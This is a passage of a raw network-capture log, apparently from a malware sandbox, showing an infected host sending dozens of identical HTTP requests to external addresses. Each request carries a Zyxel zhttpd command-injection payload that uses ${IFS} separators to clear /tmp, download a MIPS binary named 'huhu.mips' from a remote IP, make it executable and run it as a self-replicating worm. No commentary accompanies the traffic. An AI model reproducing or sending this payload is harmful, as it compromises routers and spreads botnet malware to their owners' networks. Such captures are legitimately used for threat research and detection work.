                                            Feb 2, 2024 06:21:08.543715000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3173192.168.2.1537204126.165.229.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543740988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3174192.168.2.155641087.44.197.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543785095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3175192.168.2.153309044.189.1.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543812990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3176192.168.2.155887672.88.143.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543874025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3177192.168.2.154641868.134.238.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543920040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3178192.168.2.1545490162.88.104.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543991089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3179192.168.2.1552362216.55.36.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544028997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3180192.168.2.15374142.197.7.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544085979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3181192.168.2.155870037.86.142.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544106007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3182192.168.2.1553068205.88.86.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544147968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3183192.168.2.1549498141.162.147.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544179916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3184192.168.2.1551880217.29.24.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544213057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3185192.168.2.154096248.134.104.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544265985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3186192.168.2.155755825.16.178.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544308901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3187192.168.2.1554150144.90.212.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544353962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3188192.168.2.1550068165.12.127.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544384956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3189192.168.2.153835638.153.199.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544440031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3190192.168.2.155538680.35.37.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544482946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3191192.168.2.1559124186.172.17.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544512033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3192192.168.2.1559554192.106.144.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544560909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3193192.168.2.153919671.202.240.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544585943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3194192.168.2.1542198145.64.79.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544625044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3195192.168.2.1537652126.182.108.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544661045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3196192.168.2.1541780107.108.178.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544722080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3197192.168.2.1537470221.252.74.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544761896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3198192.168.2.154818275.45.5.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544790030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3199192.168.2.1547666166.132.103.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544820070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3200192.168.2.154729297.148.225.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544872046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3201192.168.2.1539344110.128.154.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544899940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3202192.168.2.1556580150.39.89.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544943094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3203192.168.2.1539150211.191.45.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.544961929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3204192.168.2.153570854.19.89.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545003891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3205192.168.2.1559152112.169.6.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545043945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3206192.168.2.155654697.247.225.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545087099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3207192.168.2.153548013.145.41.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545135021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3208192.168.2.154243296.160.1.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545172930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3209192.168.2.155990087.169.63.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545198917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3210192.168.2.1554878216.194.248.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545244932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3211192.168.2.1543052194.73.90.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545286894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3212192.168.2.153996297.69.105.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545314074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3213192.168.2.1544984170.210.162.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545332909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3214192.168.2.155841067.4.188.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545384884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3215192.168.2.155075452.247.120.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545423985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3216192.168.2.1556658149.231.101.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545449972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3217192.168.2.154906885.169.242.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545499086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3218192.168.2.1534914191.13.100.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545556068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3219192.168.2.155535845.86.85.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545599937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3220192.168.2.1551482207.77.25.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545627117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3221192.168.2.153469499.16.78.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545660973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3222192.168.2.1554714146.95.106.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545710087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3223192.168.2.1539102131.89.83.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545742989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3224192.168.2.1548122119.165.123.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545780897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3225192.168.2.155431827.176.115.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545835972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3226192.168.2.154921012.45.23.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545856953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3227192.168.2.153974440.215.33.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545922041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3228192.168.2.1549550213.222.48.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545943022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3229192.168.2.1540114165.104.115.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.545998096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3230192.168.2.154641648.108.82.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546036005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3231192.168.2.1534228170.80.5.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546089888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3232192.168.2.1548574150.65.108.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546109915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3233192.168.2.1558142166.33.90.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546144962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3234192.168.2.153295617.134.210.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546175957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3235192.168.2.1547300161.118.83.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.546222925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3236192.168.2.1553782133.31.37.22443
                                            TimestampBytes transferredDirectionData
